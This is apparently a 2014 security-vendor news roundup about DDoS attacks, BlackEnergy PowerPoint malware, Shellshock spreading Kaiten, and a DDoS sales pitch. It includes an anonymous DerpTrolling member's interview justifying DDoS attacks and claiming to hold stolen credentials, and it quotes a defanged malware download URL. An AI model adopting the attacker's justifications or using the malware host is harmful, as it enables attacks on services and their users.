As cyber-criminals innovate and develop new techniques to tackle defensive methods, it has never been more important for information security professionals to have strong, proactive defense and remediation strategies in place. During this webinar, the speakers will share insight on how to address the risks and respond to attacks. Hear about the evolution of and motivations behind DDoS attacks and the attack vectors exploited Discover how to implement multi-layered DDoS defense Identify best practice detection and classification techniques Discover how to implement resilient DDoS incident response practices Date: November 12th 2014 Time: 10:00AM EST/15:00 GMT Click here to register !
Ukraine’s election commission website has been attacked by hackers on the eve of the country’s parliamentary polls. According to Ukrainian officials, the website came under cyber attack on Saturday, just one day before Ukraine is set to hold general elections. “There is a DDoS attack on the commission’s site,” said the Ukrainian government information security service. A distributed denial-of-service (DDoS) attack slows down or disables a website by flooding it with communications requests. The security service labeled the attack as “predictable” and went on to say that the website’s design insures that it could not be completely taken down and that it is currently completely functional. “If a site runs slowly, that doesn’t mean it has been destroyed by hackers,” the statement added. As for reports that the site was in control of hackers, Markiyan Lubkivskyy, an adviser to the Ukrainian Security Service said, “Any statements regarding the alleged successful unauthorized intrusions into the cyber space of the Central Election Commission or the elements of the elections systems do not correspond to the facts. Hackers are controlling nothing.” Ukraine’s snap elections were called in August as President Petro Poroshenko came under pressure to purge the parliament of lawmakers allegedly tied to the overthrown government of Viktor Yanukovych. As many as 36 million Ukrainians are eligible to take part in the parliamentary elections. The leaders of the breakaway eastern regions of Donetsk and Lugansk have refused to allow the polls to be held in territories under their control, with a population of almost three million. Ukraine’s mainly Russian-speaking regions in the east have been the scene of deadly clashes between pro-Russia protesters and the Ukrainian army since the government in Kiev launched military operations in mid-April in a bid to crush the protests. Source: http://www.presstv.ir/detail/2014/10/25/383623/ukraines-election-website-hacked/
As the Director of Sales for DOSarrest Internet Security I have the opportunity to speak with many prospects looking for DDoS protection service for their corporate website. What I have learned is that there are many competitors offering what I would call a “bare bones vanilla offering”. Some offer free service to service ranging in price from $200 – $300/month. These plans offer a very basic protection. They also advertise an Enterprise offering that has an expense starting point can really turn into being quite costly depending on your circumstances. The Enterprise service is the offering that any company that is serious about protecting their website should consider. There are a few issues with each of these offerings that I’d like to point out. These competitors claim they have a very large number of clients utilizing their services but fail to mention that 80-85% of them are using their free service. Roughly 10 -15% of their customers are using their $200-$300/month service which again is really just a basic protection with limited protection capabilities. When a company witnesses a large attack, which is completely out of their control, they are told they should upgrade to their enterprise offering. I hear from prospects quite often that this $200 – $300/month service does not offer adequate protection nor customer support. In most cases there is no phone support included at all! Also they will charge the client based on the size of the attack? How can a client control the size of an attack they are experiencing! This uncertainty makes it virtually impossible for a company to budget costs. Let’s not be mistaken, their goal is to get you onto their Enterprise offering which will cost you in excess of a thousand dollars per month. Alternately at DOSarrest Internet Security we offer a single Enterprise level service for all of our clients. The service includes full telephone and email access to our 24/7 support team with our service. This provides you direct access to system experts. We do not operate a tiered support service given the criticality of the service. Also we protect our clients from all DDoS attacks regardless of size without the need to pay us additional depending on the size of an attack. We also include an external monitoring account with our service called DEMS which stands for our D OSarrest E xternal M onitoring S ervice . This allows our 24/7 support team to monitor your website from 8 sensors in 4 geographical regions. We proactively inform our clients if we notice any issues with their website. Most of our competitors do not offer this service and if they do it is not included free of charge to their clients. DOSarrest has been providing DDoS protection services since 2007. Globally we were one of the very first DDoS protection providers and have successfully mitigated thousands of real world attacks. This is a not an “add on product” for us. Our team has the experience and the protection of a client’s website is our #1 priority. Please visit our newly revamped website and take a look at the testimonials page to see what some of our current customers are saying about their experience with us. Please feel free to reach out to me directly or anyone on our sales team at email@example.com for further information on our service. Brian Mohammed Director of Sales for DOSarrest Internet Security LTD.
See original article:
The DDoS Protections Services Landscape
A basic premise of a democratic society gives its citizens rights to participate in debate and effect change by taking to the streets to demonstrate. In the U.S., this is enshrined in the Bill of Rights under the First Amendment. But what happens when we all effectively live, work, shop, date, bank and get into political debates online? Because online, as Molly Sauter points out in her book The Coming Swarm , there are no streets on which to march. “Because of the densely intertwined nature of property and speech in the online space, unwelcome acts of collective protest become also acts of trespass.” Sauter argues that distributed denial of service (DDoS) attacks are a legitimate form of protest. Or at least one that needs to be examined in a larger context of lawful activism, rather than hastily and disastrously criminalized under the Patriot Act. Sauter is currently doing her Ph.D. at McGill University in Montreal after completing her Masters at MIT. Prior to attending MIT she worked as a researcher at the Berkman Center for Internet and Society at Harvard. So she’s been thinking about civil disobedience and digital culture for a while, although she admitting during a recent phone interview that “adapting and re-writing a Masters thesis into a book during the first year of doctorate study is not recommended.” As Sauter examines in The Coming Swarm , DDoS campaigns are not new. In fact they’ve been used for almost 20 years in support of various political movements from pro-Zapatista mobilization to immigration policy in Germany and, most notably, at 2010 G20 in Toronto. “Guiding this work is the overarching question of how civil disobedience and disruptive activism can be practiced in the current online space,” she told PCMag. “Actions that take place in the online sphere can only ever infringe on privately held property. The architecture of the network does not, as of yet, support spaces held in common.” The book also delves into extensive technical discussion on the evolution of simple denial-of-service attacks, where a single computer and Internet connection breaches a firewall, floods a server with packets, and overloads the system so that it malfunctions and shuts down. According to Sauter, it was the switch to distributed denial-of-service attacks that really got the authorities’ attention. Mainly because the distributed nature of attack, using zombie machines to hide the original source of the activists’ IP addresses and often effect malware, made detection almost impossible. It was then that the nature of digital debate was re-framed as a criminal act rather than civil disobedience. Source: http://www.pcmag.com/article2/0,2817,2469400,00.asp
The ‘Patch Tuesday’ fixes included a patch for a vulnerability that a Russian Hacker team was using to target NATO. These attacks target high-profile organizations so you don’t have much of a reason to be worried (but please update!). So, no need to panic, this is just an interesting scenario that sheds some light on how computers can be compromised. The Russian team is called ‘Sandstorm Team’ and has been targeting organizations in Russia, the European Union, and United States since 2009. This attack used malicious PowerPoint documents. The Sandstorm Team crafted these PowerPoint files to install a malware called ‘Black Energy’ when opened. The malware installed is ‘bot-based’ and uses a plugin architecture that can be used for Distributed Denial of Service (DDoS) attacks, credential theft, or spam. Then, in a ‘spear-fishing’ attack, they sent these files to the employees of NATO and different telecom and energy companies. A ‘spear-fishing’ attack is when the attacker pretends to be a trustworthy source to trick the victim into opening malicious files, in this case, PowerPoint files which installed malware. Normally, you don’t want to run exe files that you don’t trust as they execute unrestricted code. But a PowerPoint file should just open a PowerPoint, so it’s safe, right? Wrong. You should never open files that are from questionable sources. This particular attack used a vulnerability in OLE that allowed the attacker to execute any command, which was used to install the malware through the mere opening of the PowerPoint file. OLE stands for Object Linking and Embedding, and is used in cases such as linking an Excel report in a PowerPoint document. This way, when the Excel report is updated, so is the data that shows up in the PowerPoint. It is a very useful feature, but the attackers found a vulnerability that lets them use it to install malware. This vulnerability in the OLE has now been patched. This was a ‘zero-day,’ which are attacks where the attacker finds a vulnerability first and be able to exploit it before anyone has any knowledge about it, let alone has a chance to fix it. These types of attacks happen all the time, and the only way to fix one is to detect the malware exploiting it and then patch the vulnerability. To help ensure the safety of your own system, don’t click on anything you don’t trust, and install updates as soon as possible. Source: http://www.winbeta.org/news/how-russian-hackers-used-microsoft-powerpoint-files-hack-nato-computers
See the original post:
How Russian hackers used Microsoft PowerPoint files to hack NATO computers
Internet portal InSerbia News was unavailable on Saturday for a few hours due to a DDoS attack. The attack was committed from IP addresses in the range that belongs to internet providers in Serbia, which says that the attack was not performed using “infected” computers (botnet) throughout the world, but that it was organized and maybe coordinated attack for which were used only computers from Serbia. InSerbia wrote on October 7th about “Valter” program, which could also have been used for an attack on InSerbia portal. The way the network of people who use “Valter” is organized, and all of them are from Serbia, increases suspicion that the same software was used against us this time. Because of the situation we are forced to block all IP addresses from Serbia, so visitors from this country must pass “Captcha” check before they enter the website. We apologize to our readers because of this measure. After blocking access to IP addresses from Serbia, the server continued to function normally. At the moment this article is being written (4pm CEST), the attack is still in progress. Source: http://inserbia.info/today/2014/10/inserbia-news-under-ddos-attack-from-serbia/
Read the article:
InSerbia News under DDoS attack from Serbia
DDoS attacks are a way to keep corrupt corporations honest, according to an anonymous member of DerpTrolling, who gives us an inside look at the self-proclaimed gods of the Internet. The man behind the curtain One of the first things he says is that he absolutely cannot offer proof. This makes a disappointing amount of sense: he is a self-confessed DDoS troll, a member of the infamous group DerpTrolling. Since distributed denial-of-service attacks could be considered a federal crime under US law — and, indeed, are an offence in many locations around the globe, including the UK and Australia — he, understandably, won’t give a name, location or even rough age. As a corollary, we have no way of knowing that he is who he says he is. We’ll call him Incognito. To talk to him, we plug into a private chat session from opposite sides of the globe (as indicated by time zones) using an encrypted Chrome add-on. “I’ve seen Anonymous at its best,” he tells us. “I participated in their major DDoS attacks against Visa and PayPal, although the role DerpTrolling played in those attacks is pretty much unknown. I’ve seen the rise and fall of LulzSec. So let’s just say I am old enough to know how to stay hidden.” One thing is clear from the outset: Incognito believes that what DerpTrolling does is for the good of everyone. “DerpTrolling as a group shows the world, particularly the gaming community, how big companies and corporations such as Riot or Blizzard only care about money,” he explains. “Our methods are forcing big companies and corporations to upgrade their servers and make sure their clients are their top priority.” DerpTrolling has been around since around 2011 or so, and Incognito has been a member since the beginning. Its method of attack, as mentioned above, is DDoS — overloading servers with external communication requests, rendering the target systems unusable for a period of time. DerpTrolling has attacked several high-profile servers over the years, including those of League of Legends, World of Tanks, EVE Online, DoTA 2, Blizzard, RuneScape and, more recently, Xbox Live and the Nintendo Web store. Although their actions may appear inscrutably juvenile and unwarranted — done for, as the saying goes, the lulz — the team identifies rather strongly with Richard Stallman’s assessment of DDoS as a form of protest against what it perceives as a callous disregard for gamers on the part of games publishers. “A company that doesn’t care only for money would make the effort, which includes time and money, to make sure their servers aren’t able to be crippled by a simple DDoS attack,” Incognito said. “We decided to take action because, if we had the capability to stop corporate greed and we did nothing, that in itself is a crime. We thought DDoS attacks were appropriate because they do not affect customers in a monetary way, unlike leaking data — although we are not opposed to leaking data.” Lines in the sand He is careful to point out that DerpTrolling is against doxxing — that is, the leaking of information about a specific individual, such as address, phone number, Social Security number, credit card and bank account details — and swatting, a term for calling the police to the home of said doxxed individual for spurious reasons. In one of the most famous incidents involving the group, though, one particular individual was doxxed and swatted — Twitch streamer PhantomL0rd. While DerpTrolling was attacking Battle.net, EA.com, Club Penguin and Riot, it was allegedly because those were games PhantomL0rd was playing. At some point during the DDoS activities, PhantomL0rd was doxxed on several gaming websites — and then someone called the police to his home, accusing the streamer of holding five people hostage. Incognito is cagey about the incident, and won’t comment on why the group targeted PhantomL0rd or what precisely DerpTrolling did do — only saying that there is no hard evidence connecting DerpTrolling to the actions. “Yes, Phantoml0rd was doxxed and swatted,” he said. “But we never threatened to harm him physically and we have never taken credit for that attack.” “We decided to take action because, if we had the capability to stop corporate greed and we did nothing, that in itself is a crime.” Incognito He seems determined to impress that there are lines DerpTrolling won’t cross — that what the group does, it does for the good of all. As an example, he mentions that the group is sitting on what could have been a significant customer data leak. “We are currently in possession of over 800,000 usernames and passwords from the 2K gaming studio. As of right now, our members as a whole have decided that leaking data is not what we do, and therefore we will not leak such damaging data,” he said, adding that he had contacted 2K to inform the publisher of the vulnerability in its system — and received no response. “I personally contacted them over a month ago. I did not send them an anonymous letter, I made sure they understood exactly who I was. And offered plenty of proof.” Unless the data is actually leaked, he believes that gaming companies are unlikely to spend the money to issue a fix. CNET has contacted 2K for comment and will update when we receive a reply. Incognito also goes out of his way to dissociate DerpTrolling’s activities from those of LizardSquad, the group that claimed responsibility for calling a bomb threat on a plane carrying Sony Online Entertainment president John Smedley. “I want to make it absolutely clear that DerpTrolling is in no way affiliated with LizardSquad,” he said. Although LizardSquad had requested that the two groups work together, DerpTrolling had refused, he said. “LizardSquad is a run by an extremist hacker who has close ties to UGNazi. You could say that the ISISGang is the elite ‘leaders’ of LizardSquad. We have no wish to associate with any individual or group that has ties with such extremists.” ISISGang has been accused of making prank calls that see their targets swatted and posing as Middle Eastern terrorists, while UGNazi is allegedly responsible for several doxxings and data leaks. Incognito seems quite firm that DerpTrolling wishes to commit no actual harm. The end and the means DerpTrolling has more up its sleeve. Attacks on Xbox Live and the Nintendo Web store on Saturday, September 28 were “test fire” for “upcoming attacks”, Incognito says — although he won’t go into any further detail about that. Nor is it easy to guess who the targets might be. DerpTrolling allows the community to select targets much of the time, Incognito said, via text or tweet. The fact that sometimes the attacks achieve a result justifies the work in his view; Incognito says that League of Legends and Xbox Live have both upgraded their servers in response to DerpTrolling DDoS attacks — in spite of negative public opinion. “Children do not know what is best for them. We are basically the Gods of the Internet, we know what is best for them.” Incognito “The public will always have an opinion that is based on what the media feeds them,” he says. “Children do not know what is best for them. We are basically the Gods of the Internet, we know what is best for them.” When asked if DDoS is a snake chasing its own tail — that is, if no one engaged in DDoS attacks, then companies would not have to dedicate resources to protecting against them — he once again pleads no comment. There is a condition under which DerpTrolling will cease operations: “If the presidents of Sony and Microsoft will wear a shoe on their heads, then DerpTrolling will disband and we will not attack any more servers.” As for Incognito himself, we suspect he might be around for a long time. When asked if he himself would ever hang up his hat, he seems baffled by the question. “Why would I want to stop?” Source: http://www.cnet.com/au/news/the-gods-of-the-internet/
Hackers are exploiting the Shellshock bug to infect numerous systems, including Apple Mac OS X, with a distributed denial-of-service (DDoS) malware known as Kaiten. Security researchers from Trend Micro reported uncovering the campaign in a blog post, warning that it has the potential to inflict devastating DDoS attacks. “We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of Kaiten malware, which is used to carry out denial-of-service attacks,” read the post. “Kaiten is old IRC-controlled DDoS malware and, as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organisations.” Discovered earlier in September, Shellshock is a critical vulnerability in the Bash code used by Unix and Unix-like systems. Trend Micro listed the new attack’s ability to infect Mac OS systems as being particularly troubling, highlighting it as evidence that hackers are using Shellshock to expand the victim-base of their campaigns. “Typically, systems infected with Shellshock payloads become a part of their botnet, and therefore can be used to launch DDoS attacks. In addition, the emergence of a downloaded file that targets Mac OS clearly shows that attackers are broadening their target platform,” the security firm said. Trend Micro added that the threat is doubly dangerous as Apple had mistakenly told its users that most should be safe by default. “Users who configured to enable the Advanced Unix Services are still affected by this vulnerability,” read the post. “The Advanced Unix services enables remote access via Secure Shell which offers ease of access to system or network administrators in managing their servers. This service is most likely enabled for machines used as servers such as web servers, which are the common targets Shellshock attacks.” Apple released security patches to plug Shellshock for its OS X Maverick, Lion and Mountain Lion operating systems in September. The Trend Micro researchers added that IT managers should be on guard for the attack as it has advanced detection dodging powers. “When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the Kaiten source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file,” explained the researchers. “This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file.” The Kaiten attack is one of many recently discovered campaigns using Shellshock. Researchers from FireEye caught hackers exploiting the Shellshock Bash vulnerability to infect enterprise Network Attached Storage systems with malware at the end of September. Source: http://www.v3.co.uk/v3-uk/news/2374038/hackers-using-shellshock-to-spread-kaiten-mac-os-ddos-malware
Updates XProtect Apple has updated its XProtect anti-malware system to squash several variants of the iWorm before the malware causes any further damage.…
An unending battle against email-borne nasties and botnets Spam may be the best known security threat in the world. Anyone with email or a Facebook account has experienced it, despite providers’ best efforts to block it from their inboxes.…
Will we ever can the spam monster?